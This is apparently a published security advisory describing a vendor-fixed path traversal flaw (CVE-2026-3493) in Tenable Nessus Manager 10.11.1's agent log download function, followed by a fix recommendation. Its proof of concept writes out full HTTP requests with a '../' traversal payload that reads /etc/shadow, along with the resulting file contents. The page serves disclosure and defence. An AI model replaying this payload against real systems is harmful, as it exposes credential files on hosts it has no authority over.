{"id":25015,"date":"2026-03-30T09:05:32","date_gmt":"2026-03-30T07:05:32","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=25015"},"modified":"2026-04-08T13:33:04","modified_gmt":"2026-04-08T11:33:04","slug":"usd-2026-003","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2026-003\/","title":{"rendered":"usd-2026-003"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.6\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2026-003 | Tenable Nessus Manager 10.11.1 - Path Traversal (CWE-35)<\/h1>\n

<\/h1>\n

Product<\/strong>: Tenable Nessus Manager
\nAffected Version<\/strong>: 10.11.1
\nVulnerability Type<\/strong>: Path Traversal (CWE-35)
\nSecurity Risk<\/strong>: High
\nVendor<\/strong>: Tenable
\nVendor URL<\/strong>: https:\/\/www.tenable.com\/<\/a> <\/a>
\nVendor acknowledged vulnerability<\/strong>: Yes
\nVendor Status<\/strong>: Fixed
\nCVE Number<\/strong>: CVE-2026-3493
\nCVE Link<\/strong>: https:\/\/www.cve.org\/CVERecord?id=CVE-2026-3493<\/a>
\nAdvisory ID<\/strong>: usd-2026-003<\/p>\n

Description<\/h3>\n

Tenable Nessus Manager is a vulnerability management platform designed to centrally coordinate vulnerability scanning. It provides a management layer for orchestrating scanners and administering Nessus Agents. Nessus Manager can remotely manage, update, and configure linked agents.
\nOnce agents are linked, they receive scan instructions from the manager, perform assessments locally on the host system, and send results back to the manager.<\/p>\n

Nessus Manager also provides functionality for retrieving logs from linked agents. Administrators can request agent logs, after which the agents push their log data back to the manager, where the collected logs can then be downloaded for analysis.<\/p>\n

The log download mechanism contains a path traversal vulnerability that allows administrative users to navigate outside the intended directories and download arbitrary files from the managers underlying operating system.<\/p>\n

Proof of Concept<\/h3>\n

The log<\/strong> parameter in the POST request to \/agents\/x\/download-log<\/strong> can be exploited to access arbitrary files through path traversal, as illustrated in the sample request below:<\/p>\n

\n
<\/span>POST<\/span> \/agents\/4\/download-log<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> 192.168.213.133:8834<\/span>\nSec-Ch-Ua-Platform<\/span>:<\/span> \"Linux\"<\/span>\nAccept-Language<\/span>:<\/span> en-US,en;q=0.9<\/span>\nSec-Ch-Ua<\/span>:<\/span> \"Not=A?Brand\";v=\"24\", \"Chromium\";v=\"140\"<\/span>\nX-Cookie<\/span>:<\/span> token=187972135c67f529687c2490376cdc6989131f7d0655d362<\/span>\nSec-Ch-Ua-Mobile<\/span>:<\/span> ?0<\/span>\nUser-Agent<\/span>:<\/span> Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/140.0.0.0 Safari\/537.36<\/span>\nContent-Type<\/span>:<\/span> application\/json<\/span>\nAccept<\/span>:<\/span> *\/*<\/span>\nSec-Fetch-Site<\/span>:<\/span> same-origin<\/span>\nSec-Fetch-Mode<\/span>:<\/span> cors<\/span>\nSec-Fetch-Dest<\/span>:<\/span> empty<\/span>\nReferer<\/span>:<\/span> [https:\/\/192.168.213.133:8834\/]()<\/span>\nAccept-Encoding<\/span>:<\/span> gzip, deflate, br<\/span>\nPriority<\/span>:<\/span> u=1, i<\/span>\nConnection<\/span>:<\/span> keep-alive<\/span>\nContent-Length<\/span>:<\/span> 58<\/span>\n\n\n\n{<\/span>\"log\"<\/span>:<\/span>\"..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow\"<\/span>}<\/span>\n<\/pre>\n<\/div>\n
The response contains a one-time token issued for this specific request.<\/p>\n
\n
<\/span>HTTP<\/span>\/<\/span>1.1<\/span> 200<\/span> OK<\/span>\nCache-Control<\/span>:<\/span> no-cache, no-store, must-revalidate<\/span>\nX-Frame-Options<\/span>:<\/span> DENY<\/span>\nContent-Type<\/span>:<\/span> application\/json<\/span>\nConnection<\/span>:<\/span> close<\/span>\nX-XSS-Protection<\/span>:<\/span> 1; mode=block<\/span>\nServer<\/span>:<\/span> NessusWWW<\/span>\nX-Content-Type-Options<\/span>:<\/span> nosniff<\/span>\nDate<\/span>:<\/span> Tue, 24 Feb 2026 13:44:28 GMT<\/span>\nContent-Length<\/span>:<\/span> 76<\/span>\nContent-Security-Policy<\/span>:<\/span> upgrade-insecure-requests; block-all-mixed-content; form-action 'self'; frame-ancestors 'none'; frame-src [https:\/\/store.tenable.com;]() default-src 'self'; connect-src 'self' data.nessus-telemetry.tenable.com content.nessus-telemetry.tenable.com www.tenable.com; script-src 'self' content.nessus-telemetry.tenable.com www.tenable.com; img-src 'self' data: content.nessus-telemetry.tenable.com data.nessus-telemetry.tenable.com; style-src 'self' www.tenable.com; object-src 'none'; base-uri 'self';<\/span>\nStrict-Transport-Security<\/span>:<\/span> max-age=31536000; includeSubDomains<\/span>\nExpires<\/span>:<\/span> 0<\/span>\nExpect-CT<\/span>:<\/span> max-age=0<\/span>\nPragma<\/span>:<\/span> no-cache<\/span>\n\n\n\n{<\/span>\"token\"<\/span>:<\/span>\"21c09c96065f900cfb1d6c2f3cf548a1950578fe55b3b7cfaa7a8b5581c80c14\"<\/span>}<\/span>\n<\/pre>\n<\/div>\n
The token can then be used to perform a one-time download via the following GET request:<\/p>\n
\n
<\/span>GET<\/span> \/tokens\/21c09c96065f900cfb1d6c2f3cf548a1950578fe55b3b7cfaa7a8b5581c80c14\/download<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> 192.168.213.133:8834<\/span>\n[...]<\/span>\n<\/pre>\n<\/div>\n
As a result, the content of the \/etc\/shadow<\/strong> file are displayed in the servers response:<\/p>\n
\n
<\/span>HTTP<\/span>\/<\/span>1.1<\/span> 200<\/span> OK<\/span>\nContent-Disposition<\/span>:<\/span> attachment; filename=\"..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow\"<\/span>\nCache-Control<\/span>:<\/span> no-cache, no-store, must-revalidate<\/span>\nX-Frame-Options<\/span>:<\/span> DENY<\/span>\nContent-Type<\/span>:<\/span> application\/octet-stream<\/span>\nConnection<\/span>:<\/span> close<\/span>\nX-XSS-Protection<\/span>:<\/span> 1; mode=block<\/span>\nServer<\/span>:<\/span> NessusWWW<\/span>\nDate<\/span>:<\/span> Tue, 24 Feb 2026 13:44:35 GMT<\/span>\nX-Content-Type-Options<\/span>:<\/span> nosniff<\/span>\nContent-Security-Policy<\/span>:<\/span> upgrade-insecure-requests; block-all-mixed-content; form-action 'self'; frame-ancestors 'none'; frame-src [https:\/\/store.tenable.com;]() default-src 'self'; connect-src 'self' data.nessus-telemetry.tenable.com content.nessus-telemetry.tenable.com www.tenable.com; script-src 'self' content.nessus-telemetry.tenable.com www.tenable.com; img-src 'self' data: content.nessus-telemetry.tenable.com data.nessus-telemetry.tenable.com; style-src 'self' www.tenable.com; object-src 'none'; base-uri 'self';<\/span>\nStrict-Transport-Security<\/span>:<\/span> max-age=31536000; includeSubDomains<\/span>\nExpect-CT<\/span>:<\/span> max-age=0<\/span>\nExpires<\/span>:<\/span> 0<\/span>\nPragma<\/span>:<\/span> no-cache<\/span>\nContent-Length<\/span>:<\/span> 833<\/span>\n\nroot:!::0:99999:7:::\nbin:*:19447:0:99999:7:::\ndaemon:*:19447:0:99999:7:::\nadm:*:19447:0:99999:7:::\nlp:*:19447:0:99999:7:::\nsync:*:19447:0:99999:7:::\nshutdown:*:19447:0:99999:7:::\nhalt:*:19447:0:99999:7:::\nmail:*:19447:0:99999:7:::\noperator:*:19447:0:99999:7:::\ngames:*:19447:0:99999:7:::\nftp:*:19447:0:99999:7:::\nnobody:*:19447:0:99999:7:::\ndbus:!!:20487::::::\nsystemd-coredump:!!:20487::::::\nsystemd-resolve:!!:20487::::::\ntss:!!:20487::::::\npolkitd:!!:20487::::::\nclevis:!!:20487::::::\nunbound:!!:20487::::::\nsshd:!!:20487::::::\nsetroubleshoot:!!:20487::::::\ncockpit-ws:!!:20487::::::\ncockpit-wsinstance:!!:20487::::::\npcp:!!:20487::::::\nsssd:!!:20487::::::\nchrony:!!:20487::::::\ntcpdump:!!:20487::::::\nadmin:$6$[REDACTED]:20487:0:99999:7:::\n<\/pre>\n<\/div>\n
Fix<\/h3>\n
It is recommended to implement strict input validation and sanitization on the log parameter to prevent path traversal attacks. The application should restrict the parameter to a predefined set of valid log filenames or enforce resolution within a designated log directory. Input should be normalized to its canonical form, and any requests containing traversal sequences (e.g., ..\/<\/strong>) should be explicitly rejected.<\/p>\n
References<\/h3>\n